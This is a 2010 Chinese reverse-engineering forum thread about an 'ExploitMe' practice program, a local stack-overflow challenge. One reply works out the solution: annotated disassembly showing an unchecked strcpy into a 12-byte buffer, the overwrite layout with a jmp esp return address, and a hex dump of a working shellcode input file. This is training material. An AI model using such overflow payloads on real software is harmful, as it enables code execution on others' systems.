飘云阁

 找回密码
 加入我们

QQ登录

只需一步,快速开始

查看: 4656|回复: 7

[原创] ExploitMe

[复制链接]
  • TA的每日心情
    慵懒
    2019-3-12 17:25
  • 签到天数: 3 天

    [LV.2]偶尔看看I

    发表于 2010-5-12 11:49:46 | 显示全部楼层 |阅读模式
    本帖最后由 whypro 于 2010-5-23 14:07 编辑

    以前我们常玩CrackMe这回我们试试ExploitMe
    这是一个本地版练习溢出的测试题。
    本程序模拟终端登陆时的情况,
    所带password.txt文件,是用来输入密码。


    正常在password.txt输入1234567会显示如下:


    我给个溢出成功的图:


    [ 本帖最后由 whypro 于 2010-5-16 21:40 编辑 ]

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有账号?加入我们

    x

    相关帖子

    PYG19周年生日快乐!
  • TA的每日心情
    开心
    2019-3-18 10:35
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2010-5-28 17:15:29 | 显示全部楼层
    看看。。。
    PYG19周年生日快乐!
  • TA的每日心情
    慵懒
    2019-3-12 17:25
  • 签到天数: 3 天

    [LV.2]偶尔看看I

     楼主| 发表于 2010-5-28 18:19:03 | 显示全部楼层
    本帖最后由 whypro 于 2010-5-28 18:28 编辑

    如果ls能搞掉这个我送出50分,但必须有溢出文章!
    PYG19周年生日快乐!

    该用户从未签到

    发表于 2010-6-1 14:53:19 | 显示全部楼层
    PYG19周年生日快乐!

    该用户从未签到

    发表于 2010-7-13 06:37:35 | 显示全部楼层
    ; Attributes: bp-based frame
    ; int __cdecl sub_401020(char *Str1)
    sub_401020 proc near

    var_4C= byte ptr -4Ch
    Dest= byte ptr -0Ch       ;栈大小为 0xc
    var_4= dword ptr -4
    Str1= dword ptr  8

    push    ebp
    mov     ebp, esp
    sub     esp, 4Ch
    push    ebx
    push    esi
    push    edi
    lea     edi, [ebp+var_4C]
    mov     ecx, 13h
    mov     eax, 0CCCCCCCCh
    rep stosd
    push    offset Str2     ; "1234567"
    mov     eax, [ebp+Str1]
    push    eax             ; Str1
    call    _strcmp
    add     esp, 8
    mov     [ebp+var_4], eax
    mov     ecx, [ebp+Str1]
    push    ecx             ; Source
    lea     edx, [ebp+Dest]
    push    edx             ; Dest  大小 0xc
    call    _strcpy         ; 很明显的 _strcpy
    add     esp, 8
    mov     eax, [ebp+var_4]
    pop     edi
    pop     esi
    pop     ebx
    add     esp, 4Ch
    cmp     ebp, esp
    call    __chkesp
    mov     esp, ebp
    pop     ebp
    retn
    sub_401020 endp

    ///////////////////////////////////////
    push    ecx             ; Source
    lea     edx, [ebp+Dest]
    push    edx             ; Dest  大小 0xc
    call    _strcpy         ; 很明显的 _strcpy

    当 Source 长度大0xc时发后溢出, 最简单的shellcode形式:
              buf + ebp + jmp esp + shellcode
    长度计算:0xc + 0x4 + 0x4 + shellcode

    Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F
    00000000   31 32 33 34 35 36 37 38  39 30 61 62 63 64 65 66   1234567890abcdef
    00000010   12 45 FA 7F 33 DB 53 68  2E 50 59 47 68 39 36 40   .E?3跾h.PYGh96@
    00000020   39 8B C4 53 50 50 53 B8  EA 07 D5 77 FF D0         9嬆SPPS戈.誻
    PYG19周年生日快乐!
  • TA的每日心情
    慵懒
    2019-3-12 17:25
  • 签到天数: 3 天

    [LV.2]偶尔看看I

     楼主| 发表于 2010-7-14 06:22:55 | 显示全部楼层
    过来顶一下!
    PYG19周年生日快乐!
  • TA的每日心情
    开心
    2019-3-18 10:35
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2010-12-6 16:05:32 | 显示全部楼层
    [img][/img]哈哈,jmp esp搞定退出异常

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有账号?加入我们

    x
    PYG19周年生日快乐!
  • TA的每日心情
    慵懒
    2019-3-12 17:25
  • 签到天数: 3 天

    [LV.2]偶尔看看I

     楼主| 发表于 2010-12-12 10:24:54 | 显示全部楼层
    呵呵,祝贺曹大大!
    PYG19周年生日快乐!
    您需要登录后才可以回帖 登录 | 加入我们

    本版积分规则

    快速回复 返回顶部 返回列表